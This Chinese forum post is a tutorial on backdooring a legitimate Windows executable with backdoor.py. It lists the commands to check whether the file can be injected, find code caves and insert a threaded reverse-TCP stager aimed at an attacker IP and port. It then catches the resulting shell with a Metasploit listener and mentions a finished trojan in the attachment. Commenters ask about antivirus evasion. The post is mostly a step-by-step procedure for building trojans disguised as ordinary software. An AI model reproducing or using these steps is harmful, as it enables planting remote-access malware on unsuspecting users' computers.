本文中讲述的只是最基础使用方式,详细请参考GitHub手册
python backdoor.py -f "WSExplorer+1.3.exe" -S
-f 选定文件
-S 查看是否支持写入代码
出现WSExplorer+1.3.exe is supported表示该exe支持被插入。
python backdoor.py -f "WSExplorer+1.3.exe" -c -l 200
-c 检查
-l 代码间隙大小
表示一共查找到36处间隙
python backdoor.py -f "WSExplorer+1.3.exe" -s iat_reverse_tcp_stager_threaded -H IP -P Port -o 123.exe
-s 选择通信模块,一般选择iat_reverse_tcp_stager_threaded
-H 选择主机地址
-P 选择端口号
-o 选择输出文件格式
这是可用的通信模块,一般选择第三个。
这些24个都可以放,你可以选择需要放在那里,我一般放在.rsrc中,放在最大的里面。
这里我选择17。
告诉我生成成功,在backdoored文件夹中输出。
打开msf使用模块,更改payload进行监听
运行exe之后弹到shell
弊端:在exe进程结束之后,远程连接也会断开。
附件中附上the-backdoor工具,其中backdoored目录中exe为做好的木马,供各位参考,切勿执行,若担心安全问题也可自行在GitHub上下载,链接附在文首。
用户名 | 金币 | 积分 | 时间 | 理由 |
---|---|---|---|---|
Track-劲夫 | 50.00 | 0 | 2022-07-05 21:09:51 | 一个受益终生的帖子~~ |
打赏我,让我更有动力~
© 2016 - 2024 掌控者 All Rights Reserved.
test_707
发表于 2022-7-6
杀软测试了吗,效果如何
评论列表
加载数据中...
学kali的小白
发表于 2022-7-15
666
评论列表
加载数据中...
白且
发表于 2022-7-19
666
评论列表
加载数据中...